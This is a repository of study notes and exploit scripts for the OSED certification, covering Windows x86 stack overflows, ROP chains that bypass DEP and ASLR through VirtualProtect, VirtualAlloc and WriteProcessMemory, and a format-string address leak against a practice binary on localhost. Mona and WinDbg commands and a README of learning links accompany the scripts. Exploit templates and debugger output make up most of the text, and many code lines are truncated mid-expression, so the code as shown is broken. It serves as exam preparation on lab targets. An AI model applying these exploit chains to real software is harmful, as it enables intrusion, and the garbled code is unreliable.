struct.pack(" Nop -V 15 | #ECX => lpflOldProtect - 61c804f0 - V 16 | #EDX 00000040 => flNewProtect - V 17 | #EBX 00000201 => dwSize 512 - V 18 | #ESP ???????? => Leave as is 19 | #EBP ???????? => Call to ESP (jmp, call, push,..) -> !py mona jmp -r esp -cpb '\x00\x0a\x0d\x20\x25\x2f\x5c' 20 | #ESI ???????? => PTR to VirtualProtect - DWORD PTR of VirtualProtect 21 | #EDI RETN => ROP-Nop same as EIP --> !py mona find -type instr -s "retn" -m modulo.dll -cpb "\x00" 22 | 23 | CRASH_LEN = 5000 # change me 24 | OFFSET = 4061 # change me 25 | 26 | rop_nop = struct.pack(" u poi(0x61C832D0)+0001b030 = KERNEL32!WriteProcessMemoryStub 35 | # kernel32!WriteProcessMemory placeholder parameters 36 | rop += struct.pack(' saving eax in ebp 61 | rop += struct.pack(' [EDI] 141 | payload += struct.pack(" [ECX] 146 | payload += struct.pack(" [ECX] 168 | payload += struct.pack(" [ECX] 182 | payload += struct.pack(" !dh module 54 | ...... 55 | 56 | SECTION HEADER #6 57 | .idata name 58 | 224 virtual size 59 | 6000 virtual address 60 | 400 size of raw data 61 | 1600 file pointer to raw data 62 | 0 file pointer to relocation table 63 | 0 file pointer to line numbers 64 | 0 number of relocations 65 | 0 number of line numbers 66 | C0300040 flags 67 | Initialized Data 68 | 4 byte align 69 | Read Write 70 | ............ 71 | 72 | 0:000> ? 
modules + 224 + 6000 + 4 73 | Evaluate expression: 1649435176 = 62506228 74 | 75 | 0:000> !address 62506228 76 | Usage: Image 77 | Base Address: 62506000 78 | End Address: 62507000 79 | Region Size: 00001000 ( 4.000 kB) 80 | State: 00001000 MEM_COMMIT 81 | Protect: 00000004 PAGE_READWRITE 82 | Type: 01000000 MEM_IMAGE 83 | Allocation Base: 62500000 84 | Allocation Protect: 00000080 PAGE_EXECUTE_WRITECOPY 85 | Image Path: C:\Users\User\Desktop\vulnserver\essfunc.dll 86 | Module Name: essfunc 87 | Loaded Image Name: 88 | Mapped Image Name: 89 | More info: lmv m essfunc 90 | More info: !lmi essfunc 91 | More info: ln 0x62506228 92 | More info: !dh 0x62500000 93 | ``` 94 | 95 | 7. Get IAT 96 | ```py 97 | 0:009> !dh fsws -f 98 | 0 DLL characteristics 99 | 0 [ 0] address [size] of Export Directory 100 | 192B50 [ 1CC] address [size] of Import Directory 101 | 1AE000 [ 133E0] address [size] of Resource Directory 102 | 0 [ 0] address [size] of Exception Directory 103 | 0 [ 0] address [size] of Security Directory 104 | 0 [ 0] address [size] of Base Relocation Directory 105 | 166C40 [ 1C] address [size] of Debug Directory 106 | 0 [ 0] address [size] of Description Directory 107 | 0 [ 0] address [size] of Special Directory 108 | 0 [ 0] address [size] of Thread Storage Directory 109 | 0 [ 0] address [size] of Load Configuration Directory 110 | 0 [ 0] address [size] of Bound Import Directory 111 | 166000 [ C40] address [size] of Import Address Table Directory 112 | 0 [ 0] address [size] of Delay Import Directory 113 | 0 [ 0] address [size] of COR20 Header Directory 114 | 0 [ 0] address [size] of Reserved Directory 115 | 116 | 0:009> dps fsws +0x166000 L100 117 | 00566000 7606eb20 advapi32!RegCloseKeyStub 118 | 00566004 760731e0 advapi32!RegEnumKeyA 119 | 00566008 7606ea50 advapi32!RegQueryValueExAStub 120 | 005662f4 7588b6b0 KERNEL32!GetPrivateProfileStringA 121 | 005662f8 7588ae50 KERNEL32!WritePrivateProfileStringA 122 | 005662fc 758887a0 KERNEL32!GetModuleFileNameAStub 123 | 
...... 124 | 0:009> dps 125 | ...... 126 | ``` 127 | ## Regex ROP 128 | ```py 129 | : # (jmp|call) esp 130 | : # mov e..,e.. 131 | : # xchg e..,e.. 132 | : # push e.. # RETN 133 | : # push e.. # pop e.. # RETN 134 | : # pop e.. # RETN 135 | : # inc e.. 136 | : # dec e.. 137 | : # neg e.. 138 | : # push e.. 139 | : # pop e.. 140 | : # ADD E..,e.. 141 | : # pushad # RETN 142 | : # and E..,(E..|0x.+?|[[:alnum:]])+ 143 | : # xor E..,(E..|0x.+?|[[:alnum:]])+ 144 | : # ADD E..,(E..|0x.+?|[[:alnum:]])+ 145 | : # sub E..,(E..|0x.+?|[[:alnum:]])+ 146 | : # mov e..,DWORD PTR 147 | : # lea e.., 148 | : # MOV DWORD PTR \[(E..|E..\+[[:alnum:]]+)\],EAX 149 | ``` 150 | 151 | ## VirtualProtect Basic Template 152 | 153 | ```py 154 | #GOALS - VirtualProtect 155 | #EAX 90909090 => Nop 156 | #ECX => lpflOldProtect 157 | #EDX 00000040 => flNewProtect 158 | #EBX 00000201 => dwSize 512 159 | #ESP ???????? => Leave as is 160 | #EBP ???????? => Call to ESP (jmp, call, push,..) -> !py mona jmp -r esp -cpb '\x00' 161 | #ESI ???????? => PTR to VirtualProtect - DWORD PTR of VirtualProtect 162 | #EDI RETN => ROP-Nop same as EIP --> !py mona find -type instr -s "retn" -m module.dll -cpb "\x00" 163 | ``` 164 | ## VirtualProtect Sniper Template 165 | 166 | ```py 167 | # Calling VirtualProtect with parameters 168 | payload += struct.pack(' Nop 180 | # ECX 00000040 => flProtect 181 | # EDX 00001000 => flAllocationType 182 | # EBX 00000001 => dwSize 183 | # ESP ???????? => Leave as is 184 | # EBP ???????? => Call to ESP (jmp, call, push,..) !py mona jmp -r esp -cpb '\x00' 185 | # ESI ???????? => PTR to VirtualAlloc - DWORD PTR of VirtualAlloc 186 | # EDI RETN => ROP-Nop same as EIP !py mona find -type instr -s "retn" -m modulo.dll -cpb "\x00" 187 | ``` 188 | 189 | ## WriteProcessMemory Template 190 | No encoding for this method! 
Build the shellcode by hand instead: WriteProcessMemory copies it into a region that is already executable (with this technique usually a code cave in a module's code section, which is not writable at run time), so an encoder's self-modifying decoder stub would fault when it tries to patch itself. The bytes still have to avoid every bad character, so check the hand-built payload against the list before use. 191 | ```py 192 | # kernel32!WriteProcessMemory placeholder parameters 193 | payload += struct.pack(' Nop {DONE} 14 | #ECX 0x62506f00 => flProtect {DONE} 15 | #EDX 00000040 => flNewProtect {DONE} 16 | #EBX 00000201 => dwSize - 513 {DONE} 17 | #ESP ???????? => Leave as is 18 | #EBP ???????? => Call to ESP (jmp, call, push,..) {DONE} 19 | #ESI ???????? => PTR to VirtualAlloc - DWORD PTR of 0x6250609c {DONE} 20 | #EDI ???????? => ROP-Nop {DONE} 21 | ###### 22 | 23 | rop_nop = struct.pack(" essfunc.dll 81 | ebx += struct.pack(" essfunc.dll 91 | esi += struct.pack(" [EAX] 126 | payload += struct.pack(' [ECX] 134 | payload += struct.pack(' put 0x00000001 into ebx) 54 | rop += struct.pack(" put 0x00001000 into edx) 59 | rop += struct.pack(" put 0x00000040 into ecx) 64 | rop += struct.pack(" DebugHelp or SymGetSymFromName 5 | 6 | 7 | Basically: 8 | 1. An info leak (for example a format string or an out-of-bounds read) that reveals a pointer into a module, from which the module base is computed OR 9 | 2. A module loaded without ASLR/rebasing, whose gadgets sit at fixed addresses OR 10 | 11 | ```py 12 | !py mona modules -cm aslr=false,rebase=false 13 | ``` 14 | 3. 
Brute-force the base only when the target restarts after a failed attempt (for example a service that is relaunched automatically) and the process is 32-bit: image bases on x86 Windows get roughly 8 bits of ASLR entropy, so iterating over the candidate bases is practical, but every wrong guess crashes the process, so it is noisy and slow. 15 | -------------------------------------------------------------------------------- /6.asrl_enabled/Rainbow2/README.md: -------------------------------------------------------------------------------- 1 | Downloaded from here: [https://github.com/xct/vulnbins/tree/main](https://github.com/xct/vulnbins/blob/main/rainbow2.exe) 2 | -------------------------------------------------------------------------------- /6.asrl_enabled/Rainbow2/exploit_wpm.py: -------------------------------------------------------------------------------- 1 | import struct 2 | import socket 3 | 4 | TARGET_IP = "127.0.0.1" 5 | TARGET_PORT = 2121 6 | target = (TARGET_IP, TARGET_PORT) 7 | 8 | payload = b"PUT %p-%p-%p-%p" 9 | leak = [] 10 | with socket.create_connection(target) as sock: 11 | sent = sock.send(payload) 12 | print(f"sent {sent} bytes") 13 | 14 | resp = sock.recv(512) 15 | print(resp) 16 | 17 | 18 | s = str(resp) 19 | leak = s.split("-")[1] 20 | filesrv = int(hex(int("0x"+leak,16) - 0x14120),16) 21 | #print(base) 22 | 23 | #EXPLOIT 24 | 25 | #\x00\x09\x0a\x0b\x0c\x0d\x20\x2F\x5C 26 | total = 2100 # change me 27 | crash = 1032 28 | 29 | rop_nop = struct.pack(" u poi(3FC6015C) --> #KERNEL32!WriteFile: 39 | rop += struct.pack(' u poi(3FC6015C)+13a40 -> WriteProcessMemoryStub 49 | rop += struct.pack(' Nop 17 | # ECX 00000040 => flProtect 18 | # EDX 00001000 => flAllocationType 19 | # EBX 00000001 => dwSize 20 | # ESP ???????? => Leave as is 21 | # EBP ???????? => Call to ESP (jmp, call, push,..) DONE !py mona jmp -r esp -cpb '\x00\x0d\x0a\x25\x26\x2b\x3d' 22 | # ESI ???????? 
=> PTR to VirtualAlloc - DWORD PTR of VirtualAlloc 23 | # EDI RETN => ROP-Nop same as EIP !py mona find -type instr -s "retn" -m libspp.dll -cpb "\x00\x0d\x0a\x25\x26\x2b\x3d" 24 | #---------------------------------------------------------------------# 25 | 26 | 27 | #EAX 28 | eax = struct.pack(" KERNEL32!GetDriveTypeA 54 | esi += struct.pack(" Decimal (int): prints the next argument as a signed decimal; when the caller passed no arguments, that "argument" is whatever sits at that position on the stack, which is what leaks. 4 | 2. %s --> String: treats the next argument as a char pointer and prints the NUL-terminated string it points to — an arbitrary read once that pointer is attacker-controlled, and a crash when it is not mapped. 5 | 3. %x --> Hexadecimal: prints the next argument as hex; a run of %x (or %p) walks up the stack and is the usual way to leak addresses and to find the position of your own buffer. 6 | 4. %n --> Write: stores the number of bytes output so far into the int that the next argument points to. This is the write primitive (%hn / %hhn write 2 / 1 bytes, and width padding such as %100x sets the count). Caveat: the Microsoft CRT disables %n by default (see _set_printf_count_output), so on Windows targets expect only the read/leak primitives unless the program re-enables it. 7 | 8 | 9 | ## Resources 10 | 1. https://www.exploit-db.com/docs/english/28476-linux-format-string-exploitation.pdf 11 | 2. https://osandamalith.com/2018/02/01/exploiting-format-strings-in-windows/ 12 | 3. https://vulndev.io/2022/06/12/bypassing-dep-with-writeprocessmemory/ 13 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OSED Notes + Exercise 2 | 3 | Notes and exercises I worked through while studying for the Offensive Security Exploit Developer (OSED) certification. 4 | 5 | Every exercise was done on Windows 10 x86 (32-bit), so the offsets, bad characters and gadget addresses in the scripts are specific to that setup and must be re-derived for any other target build. 6 | 7 | ## Contents 8 | - [Stack Overflow](https://github.com/mrtouch93/OSED-Notes/tree/main/1.stack_overflow) 9 | - [SEH Overflow](https://github.com/mrtouch93/OSED-Notes/tree/main/2.seh-overflow) 10 | - [Egghunter](https://github.com/mrtouch93/OSED-Notes/tree/main/3.egghunter) 11 | - [DEP Bypass](https://github.com/mrtouch93/OSED-Notes/tree/main/5.dep_bypass) 12 | - [ASLR+DEP Bypass](https://github.com/mrtouch93/OSED-Notes/tree/main/6.asrl_enabled) 13 | - [Format String](https://github.com/mrtouch93/OSED-Notes/tree/main/7.format_strings) 14 | 15 | ## Mona Cheat Sheets 16 | 1. https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/ 17 | 2. https://www.slideshare.net/CeSeNA/mona-cheatsheet-8833245 18 | 19 | ## WinDBG Cheat Sheets 20 | 1. 
https://sites.google.com/site/taesaza0/etc/windbgcheatsheet?overridemobile=true 21 | 2. https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/getting-started-with-windbg 22 | 3. http://windbg.info/doc/1-common-cmds.html 23 | 4. http://etutorials.org/Programming/programming+microsoft+visual+c+sharp+2005/Part+IV+Debugging/Chapter+13+Advanced+Debugging/WinDbg/ 24 | 5. https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/windows-debugging-exploiting-part-2-windbg-101/ 25 | 6. https://web.archive.org/web/20160506031348/https://mtaulty.com/2004/08/03/m_4656/ 26 | 27 | 28 | ## Additional Resources 29 | 1. https://github.com/epi052/osed-scripts 30 | 2. https://github.com/nop-tech/OSED 31 | 3. https://github.com/sradley/osed 32 | 4. https://github.com/ommadawn46/win-x86-shellcoder 33 | 5. https://www.fuzzysecurity.com/tutorials.html (Windows Exploit Development Tutorial Series) 34 | 6. https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ (Follow every guides) 35 | 7. https://www.shogunlab.com/blog/2017/08/11/zdzg-windows-exploit-0.html 36 | 8. https://sec4us.com.br/cheatsheet/bufferoverflow-egghunting 37 | 9. https://mikeczumak.com/blog/windows-exploit-development-part-1-basics/ 38 | 10. https://epi052.gitlab.io/notes-to-self/blog/2020-05-22-osce-exam-practice-part-seven/ 39 | 11. https://web.archive.org/web/20190218144432/https://vellosec.net/2018/08/carving-shellcode-using-restrictive-character-sets/ 40 | 41 | ## Additional Exercises 42 | 1. https://github.com/Nero22k/Exploit_Development 43 | 2. https://github.com/CyberSecurityUP/Buffer-Overflow-Labs 44 | 3. https://www.purpl3f0xsecur1ty.tech/2021/05/26/trun_re.html 45 | 4. https://github.com/anvbis/windows.x86.expl 46 | 5. https://gitlab.csc.tntech.edu/CIG/CIG-Infrastructure/-/blob/script-fixes/ExploitDBApps/Windows.vuln.apps 47 | 6. https://github.com/VoidSec/Exploit-Development/tree/master/windows/x86 48 | 7. 
https://github.com/connormcgarr/Exploit-Development/ 49 | 8. https://github.com/xct/vulnbins 50 | 9. https://github.com/bmdyy/signatus 51 | --------------------------------------------------------------------------------